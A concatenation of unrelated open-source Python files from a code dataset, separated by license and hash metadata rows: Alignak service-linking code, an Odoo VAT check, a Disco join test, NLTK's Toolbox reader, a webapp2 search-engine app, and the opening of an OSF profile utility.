self.linkify_with_timeperiods(timeperiods, 'notification_period')
self.linkify_with_timeperiods(timeperiods, 'check_period')
self.linkify_with_timeperiods(timeperiods, 'maintenance_period')
self.linkify_with_timeperiods(timeperiods, 'snapshot_period')
self.linkify_s_by_hst(hosts)
self.linkify_s_by_sg(servicegroups)
self.linkify_one_command_with_commands(commands, 'check_command')
self.linkify_one_command_with_commands(commands, 'event_handler')
self.linkify_one_command_with_commands(commands, 'snapshot_command')
self.linkify_with_contacts(contacts)
self.linkify_with_resultmodulations(resultmodulations)
self.linkify_with_business_impact_modulations(businessimpactmodulations)
# WARNING: all escalations will not be link here
# (just the escalation here, not serviceesca or hostesca).
# This last one will be link in escalations linkify.
self.linkify_with_escalations(escalations)
self.linkify_with_triggers(triggers)
self.linkify_with_checkmodulations(checkmodulations)
self.linkify_with_macromodulations(macromodulations)
def override_properties(self, hosts):
ovr_re = re.compile(r'^([^,]+),([^\s]+)\s+(.*)$')
ovr_hosts = [h for h in hosts if getattr(h, 'service_overrides', None)]
for host in ovr_hosts:
# We're only looking for hosts having service overrides defined
if isinstance(host.service_overrides, list):
service_overrides = host.service_overrides
else:
service_overrides = [host.service_overrides]
for ovr in service_overrides:
# Checks service override syntax
match = ovr_re.search(ovr)
if match is None:
err = "Error: invalid service override syntax: %s" % ovr
host.configuration_errors.append(err)
continue
sdescr, prop, value = match.groups()
# Looks for corresponding service
service = self.find_srv_by_name_and_hostname(
getattr(host, "host_name", ""), sdescr
)
if service is None:
err = "Error: trying to override property '%s' on service '%s' " \
"but it's unknown for this host" % (prop, sdescr)
host.configuration_errors.append(err)
continue
# Checks if override is allowed
excludes = ['host_name', 'service_description', 'use',
'servicegroups', 'trigger', 'trigger_name']
if prop in excludes:
err = "Error: trying to override '%s', a forbidden property for service '%s'" % \
(prop, sdescr)
host.configuration_errors.append(err)
continue
# Pythonize the value because here value is str.
setattr(service, prop, service.properties[prop].pythonize(value))
# We can link services with hosts so
# We can search in O(hosts) instead
# of O(services) for common cases
def optimize_service_search(self, hosts):
self.hosts = hosts
# We just search for each host the id of the host
# and replace the name by the id
# + inform the host we are a service of him
def linkify_s_by_hst(self, hosts):
for s in self:
# If we do not have a host_name, we set it as
# a template element to delete. (like Nagios)
if not hasattr(s, 'host_name'):
s.host = None
continue
try:
hst_name = s.host_name
# The new member list, in id
hst = hosts.find_by_name(hst_name)
s.host = hst
# Let the host know we are his service
if s.host is not None:
hst.add_service_link(s)
else: # Ok, the host do not exists!
err = "Warning: the service '%s' got an invalid host_name '%s'" % \
(self.get_name(), hst_name)
s.configuration_warnings.append(err)
continue
except AttributeError, exp:
pass # Will be catch at the is_correct moment
# We look for servicegroups property in services and
# link them
def linkify_s_by_sg(self, servicegroups):
for s in self:
new_servicegroups = []
if hasattr(s, 'servicegroups') and s.servicegroups != '':
for sg_name in s.servicegroups:
sg_name = sg_name.strip()
sg = servicegroups.find_by_name(sg_name)
if sg is not None:
new_servicegroups.append(sg)
else:
err = "Error: the servicegroup '%s' of the service '%s' is unknown" %\
(sg_name, s.get_dbg_name())
s.configuration_errors.append(err)
s.servicegroups = new_servicegroups
# Delete services by ids
def delete_services_by_id(self, ids):
for id in ids:
del self[id]
# Apply implicit inheritance for special properties:
# contact_groups, notification_interval , notification_period
# So service will take info from host if necessary
def apply_implicit_inheritance(self, hosts):
for prop in ('contacts', 'contact_groups', 'notification_interval',
'notification_period', 'resultmodulations', 'business_impact_modulations',
'escalations', 'poller_tag', 'reactionner_tag', 'check_period',
'business_impact', 'maintenance_period'):
for s in self:
if not hasattr(s, prop) and hasattr(s, 'host_name'):
h = hosts.find_by_name(s.host_name)
if h is not None and hasattr(h, prop):
setattr(s, prop, getattr(h, prop))
# Create dependencies for services (daddy ones)
def apply_dependencies(self):
for s in self:
s.fill_daddy_dependency()
# For services the main clean is about service with bad hosts
def clean(self):
to_del = []
for s in self:
if not s.host:
to_del.append(s.id)
for sid in to_del:
del self.items[sid]
def explode_services_from_hosts(self, hosts, s, hnames):
"""
Explodes a service based on a lis of hosts.
:param hosts: The hosts container
:param s: The base service to explode
:param hnames: The host_name list to exlode sevice on
"""
duplicate_for_hosts = [] # get the list of our host_names if more than 1
not_hosts = [] # the list of !host_name so we remove them after
for hname in hnames:
hname = hname.strip()
# If the name begin with a !, we put it in
# the not list
if hname.startswith('!'):
not_hosts.append(hname[1:])
else: # the standard list
duplicate_for_hosts.append(hname)
# remove duplicate items from duplicate_for_hosts:
duplicate_for_hosts = list(set(duplicate_for_hosts))
# Ok now we clean the duplicate_for_hosts with all hosts
# of the not
for hname in not_hosts:
try:
duplicate_for_hosts.remove(hname)
except IndexError:
pass
# Now we duplicate the service for all host_names
for hname in duplicate_for_hosts:
h = hosts.find_by_name(hname)
if h is None:
err = 'Error: The hostname %s is unknown for the ' \
'service %s!' % (hname, s.get_name())
s.configuration_errors.append(err)
continue
if h.is_excluded_for(s):
continue
new_s = s.copy()
new_s.host_name = hname
self.add_item(new_s)
def _local_create_service(self, hosts, host_name, service):
'''Create a new service based on a host_name and service instance.
:param hosts: The hosts items instance.
:type hosts: alignak.objects.host.Hosts
:param host_name: The host_name to create a new service.
:param service: The service to be used as template.
:type service: Service
:return: The new service created.
:rtype: Service
'''
h = hosts.find_by_name(host_name.strip())
if h.is_excluded_for(service):
return
# Creates concrete instance
new_s = service.copy()
new_s.host_name = host_name
new_s.register = 1
self.add_item(new_s)
return new_s
def explode_services_from_templates(self, hosts, service):
"""
Explodes services from templates. All hosts holding the specified
templates are bound the service.
:param hosts: The hosts container.
:type hosts: alignak.objects.host.Hosts
:param service: The service to explode.
:type service: Service
"""
hname = getattr(service, "host_name", None)
if not hname:
return
# Now really create the services
if is_complex_expr(hname):
hnames = self.evaluate_hostgroup_expression(
hname.strip(), hosts, hosts.templates, look_in='templates')
for name in hnames:
self._local_create_service(hosts, name, service)
else:
hnames = [n.strip() for n in hname.split(',') if n.strip()]
for hname in hnames:
for name in hosts.find_hosts_that_use_template(hname):
self._local_create_service(hosts, name, service)
def explode_services_duplicates(self, hosts, s):
"""
Explodes services holding a `duplicate_foreach` clause.
:param hosts: The hosts container
:param s: The service to explode
:type s: Service
"""
hname = getattr(s, "host_name", None)
if hname is None:
return
# the generator case, we must create several new services
# we must find our host, and get all key:value we need
h = hosts.find_by_name(hname.strip())
if h is None:
err = 'Error: The hostname %s is unknown for the ' \
'service %s!' % (hname, s.get_name())
s.configuration_errors.append(err)
return
# Duplicate services
for new_s in s.duplicate(h):
if h.is_excluded_for(new_s):
continue
# Adds concrete instance
self.add_item(new_s)
def register_service_into_servicegroups(self, s, servicegroups):
"""
Registers a service into the service groups declared in its
`servicegroups` attribute.
:param s: The service to register
:param servicegroups: The servicegroups container
"""
if hasattr(s, 'service_description'):
sname = s.service_description
shname = getattr(s, 'host_name', '')
if hasattr(s, 'servicegroups'):
# Todo: See if we can remove this if
if isinstance(s.servicegroups, list):
sgs = s.servicegroups
else:
sgs = s.servicegroups.split(',')
for sg in sgs:
servicegroups.add_member([shname, sname], sg.strip())
def register_service_dependencies(self, s, servicedependencies):
"""
Registers a service dependencies.
:param s: The service to register
:param servicedependencies: The servicedependencies container
"""
# We explode service_dependencies into Servicedependency
# We just create serviceDep with goods values (as STRING!),
# the link pass will be done after
sdeps = [d.strip() for d in
getattr(s, "service_dependencies", [])]
# %2=0 are for hosts, !=0 are for service_description
i = 0
hname = ''
for elt in sdeps:
if i % 2 == 0: # host
hname = elt
else: # description
desc = elt
# we can register it (s) (depend on) -> (hname, desc)
# If we do not have enough data for s, it's no use
if hasattr(s, 'service_description') and hasattr(s, 'host_name'):
if hname == '':
hname = s.host_name
servicedependencies.add_service_dependency(
s.host_name, s.service_description, hname, desc)
i += 1
# We create new service if necessary (host groups and co)
def explode(self, hosts, hostgroups, contactgroups,
servicegroups, servicedependencies, triggers):
"""
Explodes services, from host_name, hostgroup_name, and from templetes.
:param hosts: The hosts container
:param hostgroups: The hostgoups container
:param contactgroups: The concactgoups container
:param servicegroups: The servicegoups container
:param servicedependencies: The servicedependencies container
:param triggers: The triggers container
"""
# items::explode_trigger_string_into_triggers
self.explode_trigger_string_into_triggers(triggers)
# Then for every host create a copy of the service with just the host
# because we are adding services, we can't just loop in it
for id in self.items.keys():
s = self.items[id]
# items::explode_host_groups_into_hosts
# take all hosts from our hostgroup_name into our host_name property
self.explode_host_groups_into_hosts(s, hosts, hostgroups)
# items::explode_contact_groups_into_contacts
# take all contacts from our contact_groups into our contact property
self.explode_contact_groups_into_contacts(s, contactgroups)
hnames = getattr(s, "host_name", '')
hnames = list(set([n.strip() for n in hnames.split(',') if n.strip()]))
# hnames = strip_and_uniq(hnames)
# We will duplicate if we have multiple host_name
# or if we are a template (so a clean service)
if len(hnames) == 1:
self.index_item(s)
else:
if len(hnames) >= 2:
self.explode_services_from_hosts(hosts, s, hnames)
# Delete expanded source service
if not s.configuration_errors:
self.remove_item(s)
for id in self.templates.keys():
t = self.templates[id]
self.explode_contact_groups_into_contacts(t, contactgroups)
self.explode_services_from_templates(hosts, t)
# Explode services that have a duplicate_foreach clause
duplicates = [s.id for s in self if getattr(s, 'duplicate_foreach', '')]
for id in duplicates:
s = self.items[id]
self.explode_services_duplicates(hosts, s)
if not s.configuration_errors:
self.remove_item(s)
to_remove = []
for service in self:
host = hosts.find_by_name(service.host_name)
if host and host.is_excluded_for(service):
to_remove.append(service)
for service in to_remove:
self.remove_item(service)
# Servicegroups property need to be fullfill for got the informations
# And then just register to this service_group
for s in self:
self.register_service_into_servicegroups(s, servicegroups)
self.register_service_dependencies(s, servicedependencies)
# Will create all business tree for the
# services
def create_business_rules(self, hosts, services):
for s in self:
s.create_business_rules(hosts, services)
# Will link all business service/host with theirs
# dep for problem/impact link
def create_business_rules_dependencies(self):
for s in self:
s.create_business_rules_dependencies()
| agpl-3.0 | -2,788,228,608,407,813,600 | 42.769064 | 117 | 0.572452 | false |
ingadhoc/odoo-addons | partner_vat_unique/partner.py | 10 | 1390 | # -*- encoding: utf-8 -*-
from openerp import models, api, _
from openerp.exceptions import Warning
class res_partner(models.Model):
_inherit = "res.partner"
@api.one
@api.constrains('vat', 'parent_id', 'company_id')
def check_vat_unique(self):
if not self.vat:
return True
# get first parent
parent = self
while parent.parent_id:
parent = parent.parent_id
same_vat_partners = self.search([
('vat', '=', self.vat),
('vat', '!=', False),
('company_id', '=', self.company_id.id),
])
if same_vat_partners:
related_partners = self.search([
('id', 'child_of', parent.id),
('company_id', '=', self.company_id.id),
])
same_vat_partners = self.search([
('id', 'in', same_vat_partners.ids),
('id', 'not in', related_partners.ids),
('company_id', '=', self.company_id.id),
])
if same_vat_partners:
raise Warning(_(
'Partner vat must be unique per company except on partner with parent/childe relationship. Partners with same vat and not related, are: %s!') % (', '.join(x.name for x in same_vat_partners)))
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -9,106,443,438,993,461,000 | 33.75 | 211 | 0.52518 | false |
pombredanne/disco | tests/test_query.py | 11 | 3805 | from disco.test import TestCase, TestPipe
from disco.compat import bytes_to_str, str_to_bytes
from disco.worker.pipeline.worker import Stage
from disco.worker.task_io import task_input_stream
import csv
from functools import partial
import hashlib
PREFIX='/tmp/'
def read(interface, state, label, inp):
from disco import util
for e in inp:
scheme, netloc, _ = util.urlsplit(e)
fileName, joinColumn = str(netloc).split('?')
File = open(PREFIX + fileName, 'r')
col = int(joinColumn)
reader = csv.reader(File)
firstRow = True
for row in reader:
if firstRow:
tableName = row[0]
firstRow = False
else:
fullName = tableName + '?' + str(col)
Hash = int(hashlib.md5(str_to_bytes(row[col])).hexdigest(), 16) % 160
interface.output(Hash).add(fullName, row)
def join_init(interface, params):
return {}
def join(interface, state, label, inp):
for k, v in inp:
if k not in state:
state[k] = [v]
else:
state[k].append(v)
def join_done(interface, state):
if len(state) != 2:
return
name0 = list(state.keys())[0]
name1 = list(state.keys())[1]
_, strCol0 = name0.split('?')
_, strCol1 = name1.split('?')
col0 = int(strCol0)
col1 = int(strCol1)
for entry0 in state[name0]:
for entry1 in state[name1]:
if entry0[col0] == entry1[col1]:
entry0_copy = entry0[:]
entry1_copy = entry1[:]
del entry0_copy[col0]
del entry1_copy[col1]
interface.output(0).add(entry0[col0], entry0_copy + entry1_copy)
def combine_init(interface, params, init):
return init()
def combine(interface, state, label, inp, func):
for k, v in inp:
func(state, k, v)
def combine_done(interface, state):
for k, v in state.items():
interface.output(0).add(k, v)
def _getPipeline():
select_stage = [("split", Stage('read', process=read))]
join_stage = [("group_label", Stage('join', init=join_init, process=join, done=join_done))]
def combine_row(state, k, v, func):
if k not in state:
state[k] = 0
state[k] = state[k] + func(v)
node_combine_stage = [("group_node_label",
Stage('node_combine', init=partial(combine_init, init=lambda: {}),
process=partial(combine, func=partial(combine_row, func=lambda v: 1)),
done=combine_done))]
combine_all_stage = [("group_label",
Stage('combine_all', init=partial(combine_init, init=lambda: {}),
process=partial(combine, func=partial(combine_row, func=lambda v: v)),
done=combine_done))]
return select_stage + join_stage + node_combine_stage + combine_all_stage
class PipeJob(TestPipe):
pipeline = _getPipeline()
class JoinTestCase(TestCase):
#input contains the file name and the join column
input = ['raw://cities.csv?0', 'raw://packages.csv?3']
def SetUpFiles(self):
F1 = open(PREFIX + 'cities.csv', 'w')
F1.write("cities\nEdmonton,-45\nCalgary,-35\nMontreal,-25\nToronto,-15\n")
F1.close()
F2 = open(PREFIX + 'packages.csv', 'w')
F2.write("packages\n0,2013-10-2,2013-11-3,Edmonton,Calgary\n" +
"1,2013-11-3,2013-12-3,Calgary,Toronto\n" +
"2,2013-10-4,2013-10-6,Edmonton,Montreal\n")
F2.close()
def serve(self, path):
return path
def test_per_node(self):
self.SetUpFiles()
self.job = PipeJob().run(input=self.test_server.urls(self.input))
self.assertEqual(sorted(self.results(self.job)), [('Calgary', 1), ('Edmonton', 2)])
| bsd-3-clause | 4,564,912,458,981,070,300 | 31.521368 | 95 | 0.58134 | false |
xujun10110/golismero | thirdparty_libs/nltk/toolbox.py | 12 | 17953 | # Natural Language Toolkit: Toolbox Reader
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Greg Aumann <[email protected]>
# URL: <http://nltk.org>
# For license information, see LICENSE.TXT
"""
Module for reading, writing and manipulating
Toolbox databases and settings files.
"""
import os, re, codecs
from StringIO import StringIO
from xml.etree import ElementTree
from xml.etree.ElementTree import TreeBuilder, Element, SubElement
from nltk.data import PathPointer, ZipFilePathPointer, find
class StandardFormat(object):
"""
Class for reading and processing standard format marker files and strings.
"""
def __init__(self, filename=None, encoding=None):
self._encoding = encoding
if filename is not None:
self.open(filename)
def open(self, sfm_file):
"""
Open a standard format marker file for sequential reading.
:param sfm_file: name of the standard format marker input file
:type sfm_file: str
"""
if isinstance(sfm_file, PathPointer):
# [xx] We don't use 'rU' mode here -- do we need to?
# (PathPointer.open doesn't take a mode option)
self._file = sfm_file.open(self._encoding)
else:
self._file = codecs.open(sfm_file, 'rU', self._encoding)
def open_string(self, s):
"""
Open a standard format marker string for sequential reading.
:param s: string to parse as a standard format marker input file
:type s: str
"""
self._file = StringIO(s)
def raw_fields(self):
"""
Return an iterator that returns the next field in a (marker, value)
tuple. Linebreaks and trailing white space are preserved except
for the final newline in each field.
:rtype: iter(tuple(str, str))
"""
join_string = '\n'
line_regexp = r'^%s(?:\\(\S+)\s*)?(.*)$'
# discard a BOM in the first line
first_line_pat = re.compile(line_regexp % u'(?:\ufeff)?'.encode('utf8'))
line_pat = re.compile(line_regexp % '')
# need to get first line outside the loop for correct handling
# of the first marker if it spans multiple lines
file_iter = iter(self._file)
line = file_iter.next()
mobj = re.match(first_line_pat, line)
mkr, line_value = mobj.groups()
value_lines = [line_value,]
self.line_num = 0
for line in file_iter:
self.line_num += 1
mobj = re.match(line_pat, line)
line_mkr, line_value = mobj.groups()
if line_mkr:
yield (mkr, join_string.join(value_lines))
mkr = line_mkr
value_lines = [line_value,]
else:
value_lines.append(line_value)
self.line_num += 1
yield (mkr, join_string.join(value_lines))
def fields(self, strip=True, unwrap=True, encoding=None, errors='strict', unicode_fields=None):
"""
Return an iterator that returns the next field in a ``(marker, value)``
tuple, where ``marker`` and ``value`` are unicode strings if an ``encoding``
was specified in the ``fields()`` method. Otherwise they are non-unicode strings.
:param strip: strip trailing whitespace from the last line of each field
:type strip: bool
:param unwrap: Convert newlines in a field to spaces.
:type unwrap: bool
:param encoding: Name of an encoding to use. If it is specified then
the ``fields()`` method returns unicode strings rather than non
unicode strings.
:type encoding: str or None
:param errors: Error handling scheme for codec. Same as the ``decode()``
builtin string method.
:type errors: str
:param unicode_fields: Set of marker names whose values are UTF-8 encoded.
Ignored if encoding is None. If the whole file is UTF-8 encoded set
``encoding='utf8'`` and leave ``unicode_fields`` with its default
value of None.
:type unicode_fields: sequence
:rtype: iter(tuple(str, str))
"""
if encoding is None and unicode_fields is not None:
raise ValueError, 'unicode_fields is set but not encoding.'
unwrap_pat = re.compile(r'\n+')
for mkr, val in self.raw_fields():
if encoding:
if unicode_fields is not None and mkr in unicode_fields:
val = val.decode('utf8', errors)
else:
val = val.decode(encoding, errors)
mkr = mkr.decode(encoding, errors)
if unwrap:
val = unwrap_pat.sub(' ', val)
if strip:
val = val.rstrip()
yield (mkr, val)
def close(self):
"""Close a previously opened standard format marker file or string."""
self._file.close()
try:
del self.line_num
except AttributeError:
pass
class ToolboxData(StandardFormat):
def parse(self, grammar=None, **kwargs):
if grammar:
return self._chunk_parse(grammar=grammar, **kwargs)
else:
return self._record_parse(**kwargs)
def _record_parse(self, key=None, **kwargs):
"""
Returns an element tree structure corresponding to a toolbox data file with
all markers at the same level.
Thus the following Toolbox database::
\_sh v3.0 400 Rotokas Dictionary
\_DateStampHasFourDigitYear
\lx kaa
\ps V.A
\ge gag
\gp nek i pas
\lx kaa
\ps V.B
\ge strangle
\gp pasim nek
after parsing will end up with the same structure (ignoring the extra
whitespace) as the following XML fragment after being parsed by
ElementTree::
<toolbox_data>
<header>
<_sh>v3.0 400 Rotokas Dictionary</_sh>
<_DateStampHasFourDigitYear/>
</header>
<record>
<lx>kaa</lx>
<ps>V.A</ps>
<ge>gag</ge>
<gp>nek i pas</gp>
</record>
<record>
<lx>kaa</lx>
<ps>V.B</ps>
<ge>strangle</ge>
<gp>pasim nek</gp>
</record>
</toolbox_data>
:param key: Name of key marker at the start of each record. If set to
None (the default value) the first marker that doesn't begin with
an underscore is assumed to be the key.
:type key: str
:param kwargs: Keyword arguments passed to ``StandardFormat.fields()``
:type kwargs: dict
:rtype: ElementTree._ElementInterface
:return: contents of toolbox data divided into header and records
"""
builder = TreeBuilder()
builder.start('toolbox_data', {})
builder.start('header', {})
in_records = False
for mkr, value in self.fields(**kwargs):
if key is None and not in_records and mkr[0] != '_':
key = mkr
if mkr == key:
if in_records:
builder.end('record')
else:
builder.end('header')
in_records = True
builder.start('record', {})
builder.start(mkr, {})
builder.data(value)
builder.end(mkr)
if in_records:
builder.end('record')
else:
builder.end('header')
builder.end('toolbox_data')
return builder.close()
def _tree2etree(self, parent):
from nltk.tree import Tree
root = Element(parent.node)
for child in parent:
if isinstance(child, Tree):
root.append(self._tree2etree(child))
else:
text, tag = child
e = SubElement(root, tag)
e.text = text
return root
def _chunk_parse(self, grammar=None, top_node='record', trace=0, **kwargs):
"""
Returns an element tree structure corresponding to a toolbox data file
parsed according to the chunk grammar.
:type grammar: str
:param grammar: Contains the chunking rules used to parse the
database. See ``chunk.RegExp`` for documentation.
:type top_node: str
:param top_node: The node value that should be used for the
top node of the chunk structure.
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output.
:type kwargs: dict
:param kwargs: Keyword arguments passed to ``toolbox.StandardFormat.fields()``
:rtype: ElementTree._ElementInterface
"""
from nltk import chunk
from nltk.tree import Tree
cp = chunk.RegexpParser(grammar, top_node=top_node, trace=trace)
db = self.parse(**kwargs)
tb_etree = Element('toolbox_data')
header = db.find('header')
tb_etree.append(header)
for record in db.findall('record'):
parsed = cp.parse([(elem.text, elem.tag) for elem in record])
tb_etree.append(self._tree2etree(parsed))
return tb_etree
_is_value = re.compile(r"\S")
def to_sfm_string(tree, encoding=None, errors='strict', unicode_fields=None):
"""
Return a string with a standard format representation of the toolbox
data in tree (tree can be a toolbox database or a single record).
:param tree: flat representation of toolbox data (whole database or single record)
:type tree: ElementTree._ElementInterface
:param encoding: Name of an encoding to use.
:type encoding: str
:param errors: Error handling scheme for codec. Same as the ``encode()``
builtin string method.
:type errors: str
:param unicode_fields:
:type unicode_fields: dict(str) or set(str)
:rtype: str
"""
if tree.tag == 'record':
root = Element('toolbox_data')
root.append(tree)
tree = root
if tree.tag != 'toolbox_data':
raise ValueError, "not a toolbox_data element structure"
if encoding is None and unicode_fields is not None:
raise ValueError, \
"if encoding is not specified then neither should unicode_fields"
l = []
for rec in tree:
l.append('\n')
for field in rec:
mkr = field.tag
value = field.text
if encoding is not None:
if unicode_fields is not None and mkr in unicode_fields:
cur_encoding = 'utf8'
else:
cur_encoding = encoding
if re.search(_is_value, value):
l.append((u"\\%s %s\n" % (mkr, value)).encode(cur_encoding, errors))
else:
l.append((u"\\%s%s\n" % (mkr, value)).encode(cur_encoding, errors))
else:
if re.search(_is_value, value):
l.append("\\%s %s\n" % (mkr, value))
else:
l.append("\\%s%s\n" % (mkr, value))
return ''.join(l[1:])
class ToolboxSettings(StandardFormat):
"""This class is the base class for settings files."""
def __init__(self):
super(ToolboxSettings, self).__init__()
def parse(self, encoding=None, errors='strict', **kwargs):
"""
Return the contents of toolbox settings file with a nested structure.
:param encoding: encoding used by settings file
:type encoding: str
:param errors: Error handling scheme for codec. Same as ``decode()`` builtin method.
:type errors: str
:param kwargs: Keyword arguments passed to ``StandardFormat.fields()``
:type kwargs: dict
:rtype: ElementTree._ElementInterface
"""
builder = TreeBuilder()
for mkr, value in self.fields(encoding=encoding, errors=errors, **kwargs):
# Check whether the first char of the field marker
# indicates a block start (+) or end (-)
block=mkr[0]
if block in ("+", "-"):
mkr=mkr[1:]
else:
block=None
# Build tree on the basis of block char
if block == "+":
builder.start(mkr, {})
builder.data(value)
elif block == '-':
builder.end(mkr)
else:
builder.start(mkr, {})
builder.data(value)
builder.end(mkr)
return builder.close()
def to_settings_string(tree, encoding=None, errors='strict', unicode_fields=None):
# write XML to file
l = list()
_to_settings_string(tree.getroot(), l, encoding=encoding, errors=errors, unicode_fields=unicode_fields)
return ''.join(l)
def _to_settings_string(node, l, **kwargs):
# write XML to file
tag = node.tag
text = node.text
if len(node) == 0:
if text:
l.append('\\%s %s\n' % (tag, text))
else:
l.append('\\%s\n' % tag)
else:
if text:
l.append('\\+%s %s\n' % (tag, text))
else:
l.append('\\+%s\n' % tag)
for n in node:
_to_settings_string(n, l, **kwargs)
l.append('\\-%s\n' % tag)
return
def remove_blanks(elem):
"""
Remove all elements and subelements with no text and no child elements.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
"""
out = list()
for child in elem:
remove_blanks(child)
if child.text or len(child) > 0:
out.append(child)
elem[:] = out
def add_default_fields(elem, default_fields):
"""
Add blank elements and subelements specified in default_fields.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
:param default_fields: fields to add to each type of element and subelement
:type default_fields: dict(tuple)
"""
for field in default_fields.get(elem.tag, []):
if elem.find(field) is None:
SubElement(elem, field)
for child in elem:
add_default_fields(child, default_fields)
def sort_fields(elem, field_orders):
"""
Sort the elements and subelements in order specified in field_orders.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
:param field_orders: order of fields for each type of element and subelement
:type field_orders: dict(tuple)
"""
order_dicts = dict()
for field, order in field_orders.items():
order_dicts[field] = order_key = dict()
for i, subfield in enumerate(order):
order_key[subfield] = i
_sort_fields(elem, order_dicts)
def _sort_fields(elem, orders_dicts):
"""sort the children of elem"""
try:
order = orders_dicts[elem.tag]
except KeyError:
pass
else:
tmp = [((order.get(child.tag, 1e9), i), child) for i, child in enumerate(elem)]
tmp.sort()
elem[:] = [child for key, child in tmp]
for child in elem:
if len(child):
_sort_fields(child, orders_dicts)
def add_blank_lines(tree, blanks_before, blanks_between):
"""
Add blank lines before all elements and subelements specified in blank_before.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
:param blank_before: elements and subelements to add blank lines before
:type blank_before: dict(tuple)
"""
try:
before = blanks_before[tree.tag]
between = blanks_between[tree.tag]
except KeyError:
for elem in tree:
if len(elem):
add_blank_lines(elem, blanks_before, blanks_between)
else:
last_elem = None
for elem in tree:
tag = elem.tag
if last_elem is not None and last_elem.tag != tag:
if tag in before and last_elem is not None:
e = last_elem.getiterator()[-1]
e.text = (e.text or "") + "\n"
else:
if tag in between:
e = last_elem.getiterator()[-1]
e.text = (e.text or "") + "\n"
if len(elem):
add_blank_lines(elem, blanks_before, blanks_between)
last_elem = elem
def demo():
from itertools import islice
# zip_path = find('corpora/toolbox.zip')
# lexicon = ToolboxData(ZipFilePathPointer(zip_path, 'toolbox/rotokas.dic')).parse()
file_path = find('corpora/toolbox/rotokas.dic')
lexicon = ToolboxData(file_path).parse()
print 'first field in fourth record:'
print lexicon[3][0].tag
print lexicon[3][0].text
print '\nfields in sequential order:'
for field in islice(lexicon.find('record'), 10):
print field.tag, field.text
print '\nlx fields:'
for field in islice(lexicon.findall('record/lx'), 10):
print field.text
settings = ToolboxSettings()
file_path = find('corpora/toolbox/MDF/MDF_AltH.typ')
settings.open(file_path)
# settings.open(ZipFilePathPointer(zip_path, entry='toolbox/MDF/MDF_AltH.typ'))
tree = settings.parse(unwrap=False, encoding='cp1252')
print tree.find('expset/expMDF/rtfPageSetup/paperSize').text
settings_tree = ElementTree(tree)
print to_settings_string(settings_tree).encode('utf8')
if __name__ == '__main__':
demo()
| gpl-2.0 | -2,184,836,355,627,718,400 | 35.122736 | 107 | 0.572272 | false |
devnook/cse-lrmi | main.py | 1 | 3718 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import jinja2
import os
import json
#import xmltodict
import webapp2
from webapp2_extras import routes
import logging
import urllib2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'])
class MainHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('engine.html')
lrmi_properties = [
'Typical age range',
'Learning resource type',
'Educational use',
'Use rights url',
'Time required',
'Interactivity type',
'About'
]
self.response.out.write(template.render(lrmi_properties=lrmi_properties))
class AboutHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('about.html')
self.response.out.write(template.render())
class HowtoHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('howto.html')
self.response.out.write(template.render())
class SubdomainHomeHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('howto.html')
self.response.out.write(template.render())
class DatasetsMainHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('datasets-engine.html')
self.response.out.write(template.render())
class DatasetsAboutHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('datasets-about.html')
self.response.out.write(template.render())
class DatasetsHowToHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('datasets-howto.html')
self.response.out.write(template.render())
class HomepageHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('homepage.html')
self.response.out.write(template.render())
app = webapp2.WSGIApplication([
routes.DomainRoute('edu.schema-labs.appspot.com', [
webapp2.Route('/', handler=MainHandler, name='lrmi-cse-home'),
webapp2.Route('/about', handler=AboutHandler, name='lrmi-cse-about'),
webapp2.Route('/howto', handler=HowtoHandler, name='lrmi-cse-howto'),
]),
routes.DomainRoute('datasets.schema-labs.appspot.com', [
webapp2.Route('/', handler=DatasetsMainHandler, name='datasets-cse-home'),
webapp2.Route('/about', handler=DatasetsAboutHandler, name='datasets-cse-about'),
webapp2.Route('/howto', handler=DatasetsHowToHandler, name='datasets-cse-howto'),
]),
routes.DomainRoute('schema-labs.appspot.com', [
webapp2.Route('/', handler=HomepageHandler, name='datasets-cse-home'),
]),
routes.DomainRoute('localhost', [
webapp2.Route('/', handler=MainHandler, name='datasets-cse-home'),
#webapp2.Route('/', handler=HomepageHandler, name='datasets-cse-home'),
webapp2.Route('/about', handler=AboutHandler, name='lrmi-cse-about'),
webapp2.Route('/howto', handler=HowtoHandler, name='lrmi-cse-howto'),
])
], debug=True)
| apache-2.0 | 7,341,933,721,958,709,000 | 29.983333 | 89 | 0.714094 | false |
caseyrollins/osf.io | website/profile/utils.py | 3 | 7386 | # -*- coding: utf-8 -*-
from framework import auth
from website import settings
from osf.models import Contributor
from addons.osfstorage.models import Region
from website.filters import profile_image_url
from osf.models.contributor import get_contributor_permissions
from osf.utils.permissions import reduce_permissions
from osf.utils import workflows
from website.ember_osf_web.decorators import storage_i18n_flag_active
def get_profile_image_url(user, size=settings.PROFILE_IMAGE_MEDIUM):
return profile_image_url(settings.PROFILE_IMAGE_PROVIDER,
user,
use_ssl=True,
size=size)
def serialize_user(user, node=None, admin=False, full=False, is_profile=False, include_node_counts=False):
"""
Return a dictionary representation of a registered user.
:param User user: A User object
:param bool full: Include complete user properties
"""
contrib = None
